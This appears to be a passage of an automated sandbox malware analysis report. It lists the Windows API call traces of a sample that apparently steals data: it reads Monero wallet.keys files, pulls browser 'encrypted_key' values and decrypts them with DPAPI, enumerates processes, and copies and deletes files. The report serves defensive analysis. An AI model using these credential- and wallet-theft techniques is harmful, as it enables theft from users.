                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: dc6000a118b341fcedd57728e23554ea3e7032158f5d33c739d65c90fb316120
                              • Instruction ID: 6b9b9b9f21ed8e5231e6dd63f9c2307355e19c85dea97e64345e4dd47aaac9d3
                              • Opcode Fuzzy Hash: dc6000a118b341fcedd57728e23554ea3e7032158f5d33c739d65c90fb316120
                              • Instruction Fuzzy Hash: E0114CB2A44605EBD705DB95DD49FBBBBBCEB08B10F104159F609A7280D7B49800CBA1
                              APIs
                              • StrStrA.SHLWAPI(00EEDAE0,?,?,?,001C140C,?,00EEDAE0,00000000), ref: 001C926C
                              • lstrcpyn.KERNEL32(003FAB88,00EEDAE0,00EEDAE0,?,001C140C,?,00EEDAE0), ref: 001C9290
                              • lstrlen.KERNEL32(?,?,001C140C,?,00EEDAE0), ref: 001C92A7
                              • wsprintfA.USER32 ref: 001C92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 1f04583da265bf59bf597e7117e94afb8e35be51f3d632f0125d542e7505426c
                              • Instruction ID: 909bc4839c92bd3bc558a3b6bb9609994266187e823e136ea555b79189119977
                              • Opcode Fuzzy Hash: 1f04583da265bf59bf597e7117e94afb8e35be51f3d632f0125d542e7505426c
                              • Instruction Fuzzy Hash: E301A5B5500608FFCB05DFE8CA98EAE7BB9EB48354F108148F9099B244C671AE41DB95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001B12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001B12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001B12F5
                              • RegCloseKey.ADVAPI32(?), ref: 001B12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 80d017cd152540fdfe6937a38d3ba0f571ace686d5fa4d2fc75191f97b1e033a
                              • Instruction ID: d8e88f02652a1a72db5524da9469c4d1f8c6f05cdbb394e81c4af53b8476b2eb
                              • Opcode Fuzzy Hash: 80d017cd152540fdfe6937a38d3ba0f571ace686d5fa4d2fc75191f97b1e033a
                              • Instruction Fuzzy Hash: 97011DB9A40208BBDB00DFE0DC49FAEBBBCEB48701F108159FA0997280D670AA05CB51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: abc16ae03fd07f894c924887ff0a95140e863d8c5d28d387747800ff4811c6c7
                              • Instruction ID: 264f33454c0768800709d20f19436da59a695e531a579fdfd2bd1c8121c12012
                              • Opcode Fuzzy Hash: abc16ae03fd07f894c924887ff0a95140e863d8c5d28d387747800ff4811c6c7
                              • Instruction Fuzzy Hash: 2041E5B110079C5EDB258B24CC95FFB7BE89B65708F1444ACE98A86182E371DE45CFA0
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001C6663
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C6726
                              • ExitProcess.KERNEL32 ref: 001C6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: da6c3edc496b679b87022b7abdf463e3774bc826c86e85cd5ccf6070305a64f9
                              • Instruction ID: e37ddbd0a9f17799b33ecda50dd35c04de92a53705d26883e656c8408f2ebe0e
                              • Opcode Fuzzy Hash: da6c3edc496b679b87022b7abdf463e3774bc826c86e85cd5ccf6070305a64f9
                              • Instruction Fuzzy Hash: 83312DB1801218ABDB15EB90DC96FED777CAF64304F804189F20966191DF74AB48CF5A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001D0E28,00000000,?), ref: 001C882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C8836
                              • wsprintfA.USER32 ref: 001C8850
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f2b8dec6bcf11f2a118d4a6f30438e199d183d09fa71d76d32611a427cffbed5
                              • Instruction ID: d65374cda95572452fb18306d07044a3a30412bf0eaec908aacc169aa68515ca
                              • Opcode Fuzzy Hash: f2b8dec6bcf11f2a118d4a6f30438e199d183d09fa71d76d32611a427cffbed5
                              • Instruction Fuzzy Hash: 8F210DB1A44608AFDB05DFD4DD49FBEBBB8FB48711F104119F609A7280C779A901CBA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001C951E,00000000), ref: 001C8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C8D62
                              • wsprintfW.USER32 ref: 001C8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: ec2b625d204afab9528fc177a64fbc55eaf32fbfbf3010207008f5cc52071595
                              • Instruction ID: 77630d53c933c7bfe9da48d2ed61074297862ce76e4a4a098397756ba52aeb61
                              • Opcode Fuzzy Hash: ec2b625d204afab9528fc177a64fbc55eaf32fbfbf3010207008f5cc52071595
                              • Instruction Fuzzy Hash: 56E0ECB5A40208BFD711DBD4DD0AE697BBCEB48742F004195FD0D97280DAB19E14DB96
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 001BA3FF
                              • lstrlen.KERNEL32(00000000), ref: 001BA6BC
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 001BA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: b15252208693c4531724c09d659d15dc70efa25408e616d5ac8073f7037fb895
                              • Instruction ID: 6285b35b45a51c4276d1b5567eaa6c2c239afde46f11a7b925cf707a558e909c
                              • Opcode Fuzzy Hash: b15252208693c4531724c09d659d15dc70efa25408e616d5ac8073f7037fb895
                              • Instruction Fuzzy Hash: F7E1BC7281010C9BDB16EBA4DC96FEE7338AF34305F90815DF516B6091EF30AA49CB66
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BD481
                              • lstrlen.KERNEL32(00000000), ref: 001BD698
                              • lstrlen.KERNEL32(00000000), ref: 001BD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 001BD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BD801
                              • lstrlen.KERNEL32(00000000), ref: 001BD99F
                              • lstrlen.KERNEL32(00000000), ref: 001BD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 001BDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001B9D39
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9AEF
                                • Part of subcall function 001B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001B4EEE,00000000,?), ref: 001B9B01
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9B2A
                                • Part of subcall function 001B9AC0: LocalFree.KERNEL32(?,?,?,?,001B4EEE,00000000,?), ref: 001B9B3F
                                • Part of subcall function 001B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001B9B84
                                • Part of subcall function 001B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 001B9BA3
                                • Part of subcall function 001B9B60: LocalFree.KERNEL32(?), ref: 001B9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001D05B7), ref: 001C86CA
                              • Process32First.KERNEL32(?,00000128), ref: 001C86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001C86F3
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • CloseHandle.KERNEL32(?), ref: 001C8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001D0E00,00000000,?), ref: 001C79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,001D0E00,00000000,?), ref: 001C79C4
                              • wsprintfA.USER32 ref: 001C79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              APIs
                              • CreateFileA.KERNEL32(001C3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,001C3AEE,?), ref: 001C92FC
                              • GetFileSizeEx.KERNEL32(000000FF,001C3AEE), ref: 001C9319
                              • CloseHandle.KERNEL32(000000FF), ref: 001C9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              APIs
                              • __getptd.LIBCMT ref: 001CC74E
                                • Part of subcall function 001CBF9F: __amsg_exit.LIBCMT ref: 001CBFAF
                              • __getptd.LIBCMT ref: 001CC765
                              • __amsg_exit.LIBCMT ref: 001CC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 001CC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              APIs
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4F7A
                              • lstrcat.KERNEL32(?,001D1070), ref: 001C4F97
                              • lstrcat.KERNEL32(?,00EE8928), ref: 001C4FAB
                              • lstrcat.KERNEL32(?,001D1074), ref: 001C4FBD
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C492C
                                • Part of subcall function 001C4910: FindFirstFileA.KERNEL32(?,?), ref: 001C4943
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FDC), ref: 001C4971
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FE0), ref: 001C4987
                                • Part of subcall function 001C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001C4B7D
                                • Part of subcall function 001C4910: FindClose.KERNEL32(000000FF), ref: 001C4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
